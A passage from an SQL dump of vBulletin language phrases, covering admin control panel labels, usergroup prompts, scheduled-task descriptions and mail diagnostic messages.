Result', 'vbulletin', '', 0, ''), (33880, -1, 'subscribe_choice_0', 'cpuser', 'Subscribe with no notification', 'vbulletin', '', 0, ''), (33881, -1, 'subscribe_choice_1', 'cpuser', 'Instant email notification', 'vbulletin', '', 0, ''), (33882, -1, 'subscribe_choice_2', 'cpuser', 'Daily email notification', 'vbulletin', '', 0, ''), (33883, -1, 'subscribe_choice_3', 'cpuser', 'Weekly email notification', 'vbulletin', '', 0, ''), (33884, -1, 'subscribe_choice_none', 'cpuser', 'Do not subscribe', 'vbulletin', '', 0, ''), (33885, -1, 'test', 'cpuser', 'Test', 'vbulletin', '', 0, ''), (33886, -1, 'test_email_only', 'cpuser', 'Test Email Only?(Will not send any email out)', 'vbulletin', '', 0, ''), (33887, -1, 'text_to_separate_addresses_by', 'cpuser', 'Text to separate addresses by:This is a space by default, but you may wish to produce, CSV (in this case use a comma) or quoted CSV (use: \",\" in this case, including the quotes), so both of these are possible.', 'vbulletin', '', 0, ''), (33888, -1, 'this_action_is_not_reversible', 'cpuser', 'Note: Clicking the \'delete\' button will remove the selected users completely. This action is not reversible... please be sure!

Users marked with the [ ! ] button are not editable using this system.', 'vbulletin', '', 0, ''), (33889, -1, 'this_is_a_coppa_user_do_not_change_to_registered', 'cpuser', 'This is a COPPA user. Do not change usergroup to \'Registered\' unless you have received parental consent', 'vbulletin', '', 0, ''), (33890, -1, 'this_system_allows_you_to_mass_move_delete_users', 'cpuser', 'This system allows you to mass-move users to a different usergroup, or prune away inactive members.

Use the form below to select users matching your search conditions. You will then be given the option to individually move or prune away the matched users.', 'vbulletin', '', 0, ''), (33891, -1, 'time_options', 'cpuser', 'Time Options', 'vbulletin', '', 0, ''), (33892, -1, 'update_or_add_administration_permissions', 'cpuser', 'Update or Add Administration Permissions', 'vbulletin', '', 0, ''), (33893, -1, 'updating_threads_posts', 'cpuser', 'Updating Threads / Posts', 'vbulletin', '', 0, ''), (33894, -1, 'updating_threads_posts_for_x', 'cpuser', 'Updating Threads / Posts for {1}', 'vbulletin', '', 0, ''), (33895, -1, 'updating_users', 'cpuser', 'Updating Users', 'vbulletin', '', 0, ''), (33896, -1, 'use_current_avatar', 'cpuser', 'Use Current Avatar', 'vbulletin', '', 0, ''), (33897, -1, 'use_email_notification_by_default', 'cpuser', 'Use Email Notification by Default', 'vbulletin', '', 0, ''), (33898, -1, 'use_signature_picture', 'cpuser', 'Use Signature Picture', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33899, -1, 'user_has_no_avatar', 'cpuser', 'User has no avatar', 'vbulletin', '', 0, ''), (33900, -1, 'user_manager', 'cpuser', 'User Manager', 'vbulletin', '', 0, ''), (33901, -1, 'user_moving_pruning_system', 'cpuser', 'User Moving/Pruning System', 'vbulletin', '', 0, ''), (33902, -1, 'user_no_permission_customize_profile', 'cpuser', 'This user does not have permission to customize any parts of his or her profile.', 'vbulletin', 'vBulletin Solutions', 1199377378, '3.7.0 Beta 4'), (33903, -1, 'user_profile_field_options', 'cpuser', 'User Profile Field Options', 'vbulletin', '', 0, ''), (33904, -1, 'user_ranks_desc', 'cpuser', 'User ranks are images that appear beneath your user\'s names on their posts. Ranks assigned to All Usergroups appear for everyone.', 'vbulletin', '', 0, ''), (33905, -1, 'user_set', 'cpuser', 'Yes, user set', 'vbulletin', '', 0, ''), (33906, -1, 'user_title_manager', 'cpuser', 'User Title Manager', 'vbulletin', '', 0, ''), (33907, -1, 'usergroup_leader', 'cpuser', 'Usergroup Leader', 'vbulletin', '', 0, ''), (33908, -1, 'usergroup_options', 'cpuser', 'Usergroup Options', 'vbulletin', '', 0, ''), (33909, -1, 'userid_is_greater_than', 'cpuser', 'User ID is greater than or equal to', 'vbulletin', 'vBulletin Solutions', 1201024413, '3.7.0 Beta 5'), (33910, -1, 'userid_is_less_than', 'cpuser', 'User ID is less than', 'vbulletin', 'vBulletin Solutions', 1201024391, '3.7.0 Beta 5'), (33911, -1, 'users_awaiting_moderation', 'cpuser', 'Users Awaiting Moderation', 'vbulletin', '', 0, ''), (33912, -1, 'users_with_x_private_messages_stored', 'cpuser', 'Users with {1} Private Messages Stored', 'vbulletin', '', 0, ''), (33913, -1, 'view_change_history', 'cpuser', 'View change history', 'vbulletin', 'vBulletin Solutions', 1190725796, '3.7.0 Beta 1'), (33914, -1, 'view_forum_permissions', 'cpuser', 'View Forum Permissions', 'vbulletin', '', 0, ''), (33915, -1, 'view_infractions', 'cpuser', 'View Infractions', 'vbulletin', 'vBulletin Solutions', 1157136526, '3.6.1'), (33916, -1, 'view_ip_addresses', 'cpuser', 'View IP Addresses', 'vbulletin', '', 0, ''), (33917, -1, 'view_join_requests', 'cpuser', 'View Join Requests', 'vbulletin', '', 0, ''), (33918, -1, 'view_other_ip_addresses_for_this_user', 'cpuser', 'View Other IP Addresses for this User', 'vbulletin', '', 0, ''), (33919, -1, 'view_private_message_statistics', 'cpuser', 'View Private Message Statistics', 'vbulletin', '', 0, ''), (33920, -1, 'view_social_groups_created_by_user', 'cpuser', 'View Social Groups Created by User', 'vbulletin', 'vBulletin Solutions', 1200321670, '3.7.0 Beta 4'), (33921, -1, 'visitor_messages_sent_by_the_user', 'cpuser', 'Visitor Messages sent by the User', 'vbulletin', 'vBulletin Solutions', 1222174733, '3.8.0 Alpha 2'), (33922, -1, 'warning', 'cpuser', 'Warning', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33923, -1, 'warnings', 'cpuser', 'Warnings', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33924, -1, 'warnings_are_greater_than', 'cpuser', 'Warnings are greater than or equal to', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33925, -1, 'warnings_are_less_than', 'cpuser', 'Warnings are less than', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33926, -1, 'yahoo_id', 'cpuser', 'Yahoo! ID', 'vbulletin', '', 0, ''), (33927, -1, 'yes_but_not_parsing_html', 'cpuser', 'Yes, but not parsing HTML', 'vbulletin', '', 0, ''), (33928, -1, 'you_may_not_delete_move_this_user', 'cpuser', 'You may not delete/move this user - The user is either:\\n\\n1) An Administrator\\n2) A Super-Moderator\\n3) A Moderator\\n4) Undeletable User (config.php)\\n5) You!', 'vbulletin', '', 0, ''), (33929, -1, 'add_new_usergroup', 'cpusergroup', 'Add New Usergroup', 'vbulletin', '', 0, ''), (33930, -1, 'add_new_usergroup_leader', 'cpusergroup', 'Add New Usergroup Leader', 'vbulletin', '', 0, ''), (33931, -1, 'add_usergroup_leader', 'cpusergroup', 'Add Usergroup Leader', 'vbulletin', '', 0, ''), (33932, -1, 'are_you_sure_want_to_delete_promotion_usergroup_x', 'cpusergroup', 'Are you sure you want to delete the promotion from the usergroup called \'{1}\'?
({2}: {3})

{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'), (33933, -1, 'are_you_sure_want_to_delete_usergroup_leader_x', 'cpusergroup', 'Are you sure you want to delete the usergroup leader called \'{1}\'?
({2}: {3})

{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'), (33934, -1, 'are_you_sure_want_to_delete_usergroup_x', 'cpusergroup', 'Are you sure you want to delete the usergroup called \'{1}\'?
({2}: {3})

{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'), (33935, -1, 'create_permissions_based_off_of_forum', 'cpusergroup', 'Create Forum Permissions Based off of Usergroup:', 'vbulletin', 'vBulletin Solutions', 1200352357, '3.7.0 Beta 4'), (33936, -1, 'create_usergroup_based_off_of_usergroup', 'cpusergroup', 'Create Usergroup Based off of Usergroup:', 'vbulletin', '', 0, ''), (33937, -1, 'custom_usergroups', 'cpusergroup', 'Custom Usergroups', 'vbulletin', '', 0, ''), (33938, -1, 'days_registered', 'cpusergroup', 'Days Registered', 'vbulletin', '', 0, ''), (33939, -1, 'default_usergroups', 'cpusergroup', 'Default Usergroups', 'vbulletin', '', 0, ''), (33940, -1, 'delete_usergroup', 'cpusergroup', 'Delete Usergroup', 'vbulletin', '', 0, ''), (33941, -1, 'edit_usergroup', 'cpusergroup', 'Edit Usergroup', 'vbulletin', '', 0, ''), (33942, -1, 'processing_join_requests', 'cpusergroup', 'Processing Join Requests', 'vbulletin', '', 0, ''), (33943, -1, 'promotion', 'cpusergroup', 'Promotion', 'vbulletin', '', 0, ''), (33944, -1, 'public_group_settings', 'cpusergroup', 'Public Group Settings', 'vbulletin', '', 0, ''), (33945, -1, 'public_joinable_custom_usergroup', 'cpusergroup', 'Public (Joinable) Custom Usergroups', 'vbulletin', '', 0, ''), (33946, -1, 'show_all_additional_users', 'cpusergroup', 'Show All Additional Users', 'vbulletin', '', 0, ''), (33947, -1, 'show_all_primary_users', 'cpusergroup', 'Show All Primary Users', 'vbulletin', '', 0, ''), (33948, -1, 'usergroup_manager', 'cpusergroup', 'Usergroup Manager', 'vbulletin', '', 0, ''), (33949, -1, 'view_join_requests', 'cpusergroup', 'View Join Requests', 'vbulletin', '', 0, ''), (33950, -1, 'view_reputation', 'cpusergroup', 'View Reputation', 'vbulletin', '', 0, ''), (33951, -1, 'active', 'cron', 'Active', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33952, -1, 'add_new_scheduled_task', 'cron', 'Add New Scheduled Task', 'vbulletin', '', 0, ''), (33953, -1, 'allow_html_in_announcements', 'cron', 'Allow HTML in Announcements\r\nStrongly not recommended - see Help', 'vbulletin', 'vBulletin Solutions', 1149685038, '3.6.0 Beta 1'), (33954, -1, 'are_you_sure_want_to_delete_rssfeed_x', 'cron', 'Are you sure you want to delete the RSS feed called \'{1}\'?
\r\n
\r\nDeleting this item will not remove any threads, posts or announcements posted from the feed. Please use the regular moderation tools if you wish to remove these.', 'vbulletin', 'vBulletin Solutions', 1149590219, '3.6.0 Beta 1'), (33955, -1, 'are_you_sure_you_want_to_delete_this_scheduled_task', 'cron', 'Are you sure you want to delete this Scheduled Task?', 'vbulletin', '', 0, ''), (33956, -1, 'body_template', 'cron', 'Body Template', 'vbulletin', 'vBulletin Solutions', 1149265052, '3.6.0 Beta 1'), (33957, -1, 'check_feed_every', 'cron', 'Check Feed Every...', 'vbulletin', 'vBulletin Solutions', 1149264951, '3.6.0 Beta 1'), (33958, -1, 'close_thread_after_delay', 'cron', 'Close Thread After Delay', 'vbulletin', 'vBulletin Solutions', 1149684742, '3.6.0 Beta 1'), (33959, -1, 'convert_html_to_bbcode', 'cron', 'Convert HTML to BB Code.\r\nIf this is enabled then the setting \"Allow HTML in Announcements\" will be ignored', 'vbulletin', 'vBulletin Solutions', 1150889935, '3.6.0 Beta 3'), (33960, -1, 'day_abbr', 'cron', 'D', 'vbulletin', 'vBulletin Solutions', 1149703360, '3.6.0 Beta 1'), (33961, -1, 'day_of_month', 'cron', 'Day of the Month', 'vbulletin', '', 0, ''), (33962, -1, 'day_of_week', 'cron', 'Day of the Week (Note: this overrides the \'day of the month\' option)', 'vbulletin', '', 0, ''), (33963, -1, 'days_for_announcement_to_remain_active', 'cron', 'Days for Announcement to Remain Active', 'vbulletin', 'vBulletin Solutions', 1149265119, '3.6.0 Beta 1'), (33964, -1, 'dow_acronym', 'cron', 'DoW', 'vbulletin', 'vBulletin Solutions', 1149703374, '3.6.0 Beta 1'), (33965, -1, 'edit_rss_feed', 'cron', 'Edit RSS Feed', 'vbulletin', 'vBulletin Solutions', 1149264837, '3.6.0 Beta 1'), (33966, -1, 'feed_is_enabled', 'cron', 'Feed is Enabled', 'vbulletin', 'vBulletin Solutions', 1149264926, '3.6.0 Beta 1'), (33967, -1, 'feed_supports_content_encoded', 'cron', 'This feed supports content:encoded. Your imported feeds may appear nicer if you use {feed:content:encoded} in your bodytemplate instead of {feed:description} and enable the Convert HTML to BB Code option.', 'vbulletin', 'vBulletin Solutions', 1193148264, '3.7.0 Beta 1'), (33968, -1, 'friday_abbr', 'cron', 'Fri', 'vbulletin', '', 0, ''), (33969, -1, 'hour_abbr', 'cron', 'h', 'vbulletin', 'vBulletin Solutions', 1149703354, '3.6.0 Beta 1'), (33970, -1, 'last_checked', 'cron', 'Last Checked', 'vbulletin', 'vBulletin Solutions', 1149265149, '3.6.0 Beta 1'), (33971, -1, 'log_phrase', 'cron', 'Log Phrase', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33972, -1, 'make_thread_sticky', 'cron', 'Make Thread Sticky', 'vbulletin', 'vBulletin Solutions', 1149265106, '3.6.0 Beta 1'), (33973, -1, 'match_all_words', 'cron', 'Match All Words', 'vbulletin', 'vBulletin Solutions', 1220363305, '3.8.0 Alpha 1'), (33974, -1, 'maximum_items_to_fetch', 'cron', 'Maximum Items to Fetch\r\nAny items above this number found in the feed will be ignored.', 'vbulletin', 'vBulletin Solutions', 1149265006, '3.6.0 Beta 1'), (33975, -1, 'min_abbr', 'cron', 'm', 'vbulletin', 'vBulletin Solutions', 1149703346, '3.6.0 Beta 1'), (33976, -1, 'moderate_thread', 'cron', 'Moderate Thread\r\nIf set to \'Yes\', threads will be invisible when posted until authorized by a board staff member.', 'vbulletin', 'vBulletin Solutions', 1149414097, '3.6.0 Beta 1'), (33977, -1, 'monday_abbr', 'cron', 'Mon', 'vbulletin', '', 0, ''), (33978, -1, 'month_abbr', 'cron', 'M', 'vbulletin', 'vBulletin Solutions', 1149703366, '3.6.0 Beta 1'), (33979, -1, 'next_time', 'cron', 'Next Time', 'vbulletin', '', 0, ''), (33980, -1, 'note_prefix_must_allowed_forum', 'cron', 'Note: the prefix you choose must be allowed in the destination forum!', 'vbulletin', 'vBulletin Solutions', 1190043549, '3.7.0 Beta 1'), (33981, -1, 'post_items_as_announcements', 'cron', 'Post Items as Announcements', 'vbulletin', 'vBulletin Solutions', 1149265088, '3.6.0 Beta 1'), (33982, -1, 'post_items_as_threads', 'cron', 'Post Items as Threads', 'vbulletin', 'vBulletin Solutions', 1149265072, '3.6.0 Beta 1'), (33983, -1, 'preview_feed', 'cron', 'Preview Feed', 'vbulletin', 'vBulletin Solutions', 1149265128, '3.6.0 Beta 1'), (33984, -1, 'reset_last_checked_time', 'cron', 'Reset Last Checked Time', 'vbulletin', 'vBulletin Solutions', 1149264909, '3.6.0 Beta 1'), (33985, -1, 'rss_feed', 'cron', 'RSS Feed', 'vbulletin', 'vBulletin Solutions', 1149265138, '3.6.0 Beta 1'), (33986, -1, 'rss_templates_description', 'cron', 'The two templates listed here are used for the title (title template) and body (body template) of messages posted by the RSS poster.
\r\n
\r\nYou can specify exactly how these items appear and any item from a feed can be inserted by using {feed:fieldname} where \'fieldname\' corresponds to one of the following: title, description, link, id, date, enclosure_href and content:encoded.', 'vbulletin', 'vBulletin Solutions', 1193148575, '3.7.0 Beta 1'), (33987, -1, 'rssfeed_body_template', 'cron', '{feed:description}\r\n\r\n[url={feed:link}]More...[/url]', 'vbulletin', 'vBulletin Solutions', 1193148743, '3.7.0 Beta 1'), (33988, -1, 'rssfeed_title_template', 'cron', '{feed:title}', 'vbulletin', 'vBulletin Solutions', 1193148816, '3.7.0 Beta 1'), (33989, -1, 'run_now', 'cron', 'Run Now', 'vbulletin', '', 0, ''), (33990, -1, 'run_scheduled_task_now', 'cron', 'Run Scheduled Task Now', 'vbulletin', 'vBulletin Solutions', 1149589372, '3.6.0 Beta 1'), (33991, -1, 'saturday_abbr', 'cron', 'Sat', 'vbulletin', '', 0, ''), (33992, -1, 'scheduled_task', 'cron', 'Scheduled Task', 'vbulletin', '', 0, ''), (33993, -1, 'scheduled_task_manager', 'cron', 'Scheduled Task Manager', 'vbulletin', '', 0, ''), (33994, -1, 'scheduled_tasks', 'cron', 'Scheduled Tasks', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33995, -1, 'search_item_body', 'cron', 'Search Item Body', 'vbulletin', 'vBulletin Solutions', 1220441505, '3.8.0 Alpha 1'), (33996, -1, 'search_items_for_words', 'cron', 'Search Items for Words\r\nOnly insert items if they contain one or more of these words. Put a space or a new line between each search word. You can create a phrase with multiple words by enclosing them in double quotes.', 'vbulletin', 'vBulletin Solutions', 1220437646, '3.8.0 Alpha 1'), (33997, -1, 'sunday_abbr', 'cron', 'Sun', 'vbulletin', '', 0, ''), (33998, -1, 'task_activate_desc', 'cron', 'This script sends reminder emails to users in the Awaiting Confirmation usergroup. An email is sent one day after the user has registered and again at five days.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (33999, -1, 'task_activate_log', 'cron', 'Activation Reminder Emails sent to: {1}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34000, -1, 'task_activate_title', 'cron', 'Activation Reminder Email', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34001, -1, 'task_attachmentviews_desc', 'cron', 'This script updates attachment views once an hour if the delayed attachment views option is enabled. This is suggested for forums with a large number of attachments or users.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34002, -1, 'task_attachmentviews_log', 'cron', 'Attachment Views Updated', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34003, -1, 'task_attachmentviews_title', 'cron', 'Attachment Views', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34004, -1, 'task_birthday_desc', 'cron', 'Sends emails to users on their birthday.', 'vbulletin', 'vBulletin Solutions', 1149675081, '3.6.0 Beta 1'), (34005, -1, 'task_birthday_log', 'cron', 'Birthday Email Sent to: {1}', 'vbulletin', 'vBulletin Solutions', 1149675081, '3.6.0 Beta 1'), (34006, -1, 'task_birthday_title', 'cron', 'Birthdays', 'vbulletin', 'vBulletin Solutions', 1149675081, '3.6.0 Beta 1'), (34007, -1, 'task_ccbill_desc', 'cron', 'This script is only needed if you enable the CCBill payment processor. It will contact the CCBill server to check for reversed payments and update your subscriptions accordingly.', 'vbulletin', 'vBulletin Solutions', 1149083711, '3.6.0 Beta 1'), (34008, -1, 'task_ccbill_log', 'cron', 'CCBill: {1}', 'vbulletin', 'vBulletin Solutions', 1149083711, '3.6.0 Beta 1'), (34009, -1, 'task_ccbill_title', 'cron', 'CCBill Reversal Check', 'vbulletin', 'vBulletin Solutions', 1149083711, '3.6.0 Beta 1'), (34010, -1, 'task_cleanup2_desc', 'cron', 'This script performs various cleanup tasks once per hour.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34011, -1, 'task_cleanup2_log', 'cron', 'Hourly Cleanup #2 Completed', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34012, -1, 'task_cleanup2_title', 'cron', 'Hourly Cleanup #2', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34013, -1, 'task_cleanup_desc', 'cron', 'This script performs various cleanup tasks once per hour.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34014, -1, 'task_cleanup_log', 'cron', 'Hourly Cleanup #1 Completed', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34015, -1, 'task_cleanup_title', 'cron', 'Hourly Cleanup', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34016, -1, 'task_dailycleanup_desc', 'cron', 'This script performs various cleanup tasks once per day.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34017, -1, 'task_dailycleanup_log', 'cron', 'Daily Cleanup Completed', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34018, -1, 'task_dailycleanup_title', 'cron', 'Daily Cleanup', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34019, -1, 'task_digestdaily_desc', 'cron', 'This script sends out new post and new thread digests once per day.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34020, -1, 'task_digestdaily_log', 'cron', 'Daily Digest Sent', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34021, -1, 'task_digestdaily_title', 'cron', 'Daily Digest', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34022, -1, 'task_digestweekly_desc', 'cron', 'This script sends out new post and new thread digests once per week.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34023, -1, 'task_digestweekly_log', 'cron', 'Weekly Digest Sent', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34024, -1, 'task_digestweekly_title', 'cron', 'Weekly Digest', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34025, -1, 'task_infractions_desc', 'cron', 'Removes expired infractions twice an hour.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34026, -1, 'task_infractions_log', 'cron', 'Infraction Expired for: {1}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34027, -1, 'task_infractions_title', 'cron', 'Infractions Cleanup', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34028, -1, 'task_promotion_desc', 'cron', 'This script performs usergroup promotions once per hour.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34029, -1, 'task_promotion_log', 'cron', 'Usergroup: {1}{2}; Users: {3}* = Primary Usergroup, % = Secondary Usergroup', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34030, -1, 'task_promotion_title', 'cron', 'User Promotions', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34031, -1, 'task_reminder_desc', 'cron', 'This script sends out calendar event reminders twice an hour.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34032, -1, 'task_reminder_log', 'cron', 'Event Reminder Email Sent to: {1}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34033, -1, 'task_reminder_title', 'cron', 'Event Reminder', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34034, -1, 'task_removebans_desc', 'cron', 'This script restores the access of temporarily banned users once an hour.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34035, -1, 'task_removebans_log', 'cron', 'Lifted Ban on Users: {1}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34036, -1, 'task_removebans_title', 'cron', 'Restore Temporarily Banned Users', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34037, -1, 'task_rssposter_desc', 'cron', 'Reads RSS feeds from the internet and inserts them into your board as threads or announcements.', 'vbulletin', 'vBulletin Solutions', 1149080170, '3.6.0 Beta 1'), (34038, -1, 'task_rssposter_log', 'cron', 'Inserted the following: {1}', 'vbulletin', 'vBulletin Solutions', 1149080170, '3.6.0 Beta 1'), (34039, -1, 'task_rssposter_title', 'cron', 'RSS Poster Robot', 'vbulletin', 'vBulletin Solutions', 1149080170, '3.6.0 Beta 1'), (34040, -1, 'task_stats_desc', 'cron', 'This script updates forum stats once per day. These are the stats that are accessed from the Admin Control Panel (New Users, New Threads, New Posts, Active Users).', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34041, -1, 'task_stats_log', 'cron', 'Daily Statistics Updated', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34042, -1, 'task_stats_title', 'cron', 'Daily Statistics Log', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34043, -1, 'task_subscriptions_desc', 'cron', 'Once per day, this script removes expired paid subscriptions as well as sends out reminders about soon to expire subscriptions.', 'vbulletin', 'vBulletin Solutions', 1153130364, '3.6.0 Release Candidate 2'), (34044, -1, 'task_subscriptions_log', 'cron', 'Paid Subscriptions Updated', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34045, -1, 'task_subscriptions_title', 'cron', 'Subscriptions', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34046, -1, 'task_threadviews_desc', 'cron', 'This script updates thread views once per hour. This option is suggested for forums with large numbers of threads or users.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34047, -1, 'task_threadviews_log', 'cron', 'Thread Views Updated', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34048, -1, 'task_threadviews_title', 'cron', 'Thread Views', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34049, -1, 'thread_action_delay', 'cron', 'Thread Action Delay (Hours)\r\nIf you specify a number of hours here, the actions checked below will be performed on the inserted thread after the delay specified. Set to 0 to disable this feature.', 'vbulletin', 'vBulletin Solutions', 1209205296, '3.7.0'), (34050, -1, 'thursday_abbr', 'cron', 'Thu', 'vbulletin', '', 0, ''), (34051, -1, 'title_template', 'cron', 'Title Template', 'vbulletin', 'vBulletin Solutions', 1149265040, '3.6.0 Beta 1'), (34052, -1, 'tuesday_abbr', 'cron', 'Tue', 'vbulletin', '', 0, ''), (34053, -1, 'unstick_thread_after_delay', 'cron', 'Unstick Sticky Thread After Delay', 'vbulletin', 'vBulletin Solutions', 1149684750, '3.6.0 Beta 1'), (34054, -1, 'url_of_feed', 'cron', 'URL of Feed', 'vbulletin', 'vBulletin Solutions', 1149264936, '3.6.0 Beta 1'), (34055, -1, 'wednesday_abbr', 'cron', 'Wed', 'vbulletin', '', 0, ''), (34056, -1, 'x_hours', 'cron', '{1} Hours', 'vbulletin', 'vBulletin Solutions', 1152888856, '3.6.0 Release Candidate 2'), (34057, -1, 'x_minutes', 'cron', '{1} Minutes', 'vbulletin', 'vBulletin Solutions', 1149264970, '3.6.0 Beta 1'), (34058, -1, 'x_unable_to_open_url', 'cron', '

{1} Unable to open URL or no data returned

', 'vbulletin', 'vBulletin Solutions', 1151348283, '3.6.0 Beta 4'), (34059, -1, 'x_xml_error_y_at_line_z', 'cron', '

{1} XML Error: {2} at line {3}

', 'vbulletin', 'vBulletin Solutions', 1151347282, '3.6.0 Beta 4'), (34060, -1, 'check_mail_server_configured_correctly', 'diagnostic', 'Check your mail server to ensure it is configured correctly to allow PHP to send mail from it. You should also check your mail server\'s error log for more diagnostic information.', 'vbulletin', '', 0, ''), (34061, -1, 'details', 'diagnostic', 'Details', 'vbulletin', 'vBulletin Solutions', 1147366400, '3.6.0 Beta 1'), (34062, -1, 'email_sent_check_shortly', 'diagnostic', 'No errors were returned while attempting to send the email. Check {1} shortly to confirm you\'ve received the email. If you don\'t receive the email, try sending the test to a different address. If that fails, check your mail server\'s configuration.', 'vbulletin', '', 0, ''), (34063, -1, 'email_test_explained', 'diagnostic', 'The goal of this test is to determine whether any vBulletin or PHP settings must be changed to allow the sending of email through vBulletin. To begin, simply enter an email address that you have the ability to access and click Send Email.', 'vbulletin', '', 0, ''), (34064, -1, 'file_contents_mismatch', 'diagnostic', 'File does not contain expected contents', 'vbulletin', '', 0, ''), (34065, -1, 'file_copied_to_tmp_dir_now_readable', 'diagnostic', 'After copying the file into the specified \"Safe Mode Temp Directory\", it became readable. Uploads will function, but only when uploading in safe mode is enable.', 'vbulletin', '', 0, ''), (34066, -1, 'file_copied_to_tmp_dir_now_unreadable', 'diagnostic', 'After copying the file into the specified \"Safe Mode Temp Directory,\" it remained unreadable. PHP\'s safe_mode setting must be disabled for uploads to function. You will need to contact your host for this to be changed.', 'vbulletin', '', 0, ''), (34067, -1, 'file_not_found', 'diagnostic', 'File not found', 'vbulletin', '', 0, ''), (34068, -1, 'file_not_readable', 'diagnostic', 'File not readable', 'vbulletin', 'vBulletin Solutions', 1156955387, '3.6.1'), (34069, -1, 'file_not_recognized', 'diagnostic', 'File not recognized as part of vBulletin', 'vbulletin', '', 0, ''), (34070, -1, 'file_upload_setting_off', 'diagnostic', 'File uploads have been turned off via PHP\'s file_uploads setting. This can only be handled by contacting your host and asking them to enable the file_upload setting.', 'vbulletin', '', 0, ''), (34071, -1, 'file_version_mismatch_x_expected_y', 'diagnostic', 'File version mismatch: found {1}, expected {2}', 'vbulletin', '', 0, ''), (34072, -1, 'file_versions_explained', 'diagnostic', 'This function will list each of your vBulletin files that is tagged with a different version than your forum is currently at, which is {1}.
\r\n
\r\nThis tool is intended to verify the integrity of your vBulletin files and only scans files with a limited number of extensions.', 'vbulletin', 'vBulletin Solutions', 1229596855, '3.8.0 Release Candidate 2'), (34073, -1, 'mail_function_errors_returned_were', 'diagnostic', 'The following errors were outputted by PHP when attempting to send mail:', 'vbulletin', '', 0, ''), (34074, -1, 'mail_function_returned_error', 'diagnostic', 'The mailing function returned an error while trying to send the mail.', 'vbulletin', '', 0, ''), (34075, -1, 'mod_security_ajax_issue', 'diagnostic', 'AJAX Unicode Issue', 'vbulletin', 'vBulletin Solutions', 1203957345, '3.7.0 Beta 6'), (34076, -1, 'mod_security_problem_desc', 'diagnostic', 'The above setting will indicate if mod_security is preventing some AJAX requests from being submitted to vBulletin. If this shows Yes then you either need to disable mod_security or change the AJAX settings with the vBulletin Options and disable Problematic features.', 'vbulletin', 'vBulletin Solutions', 1203959437, '3.7.0 Beta 6'), (34077, -1, 'module_loaded', 'diagnostic', 'Module Loaded', 'vbulletin', 'vBulletin Solutions', 1203957095, '3.7.0 Beta 6'), (34078, -1, 'mysql_status', 'diagnostic', 'MySQL Status', 'vbulletin', '', 0, ''), (34079, -1, 'mysql_variables', 'diagnostic', 'MySQL Variables', 'vbulletin', '', 0, ''), (34080, -1, 'no_errors_occured_opening_upload', 'diagnostic', 'No 